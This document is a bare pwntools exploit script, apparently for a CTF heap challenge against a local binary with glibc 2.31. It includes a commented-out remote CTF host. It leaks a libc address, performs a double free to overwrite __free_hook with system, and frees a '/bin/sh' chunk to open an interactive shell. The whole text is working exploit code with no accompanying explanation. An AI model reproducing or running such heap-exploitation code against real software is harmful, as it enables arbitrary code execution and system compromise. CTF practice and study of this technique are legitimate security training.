2.31
exp:
from pwn import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])
# io=remote("node3.anna.nssctf.cn",28245)
io=process("./service")
libc=ELF("./libc-2.31.so")
def add(n,s,cc):
io.sendlineafter(b">> ",b"1")
io.sendlineafter(b">> ",str(n))
io.sendlineafter(b">> ",str(s))
io.sendafter(b">> ",cc)
def show(n):
io.sendlineafter(b">> ",b"2")
io.sendlineafter(b">> ",str(n))
def delete(n):
io.sendlineafter(b">> ",b"3")
io.sendlineafter(b">> ",str(n))
for i in range(8):
add(i,0x90,b"/bin/sh\x00")
add(8,0x10,b"/bin/sh\x00")
for i in range(8):
delete(i)
show(7)
leak_addr=u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))-0x70-libc.sym[b"__malloc_hook"]
print("leak_addr: "+hex(leak_addr))
sys_addr=leak_addr+libc.sym[b"system"]
free_hook=leak_addr+libc.sym[b"__free_hook"]
for i in range(0,10):
add(i,0x60,b"/bin/sh\x00")
for i in range(0,7):
delete(i)
gdb.attach(io)
pause()
delete(9)
delete(10)
delete(7)
delete(8)
delete(7)
for i in range(0,7):
add(i,0x60,b"/bin/sh\x00")
add(11,0x60,p64(free_hook))
add(12,0x60,b"/bin/sh\x00")
add(13,0x60,b"/bin/sh\x00")
add(14,0x60,p64(sys_addr))
delete(12)
io.interactive()